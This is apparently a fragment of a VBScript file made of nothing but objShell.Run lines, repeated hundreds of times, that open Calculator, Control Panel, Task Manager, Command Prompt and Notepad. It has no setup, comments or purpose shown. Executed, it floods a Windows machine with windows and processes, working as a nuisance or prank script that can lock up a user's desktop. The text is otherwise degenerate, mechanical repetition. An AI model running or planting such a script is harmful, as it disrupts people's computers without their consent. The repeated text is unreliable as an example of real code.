
objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
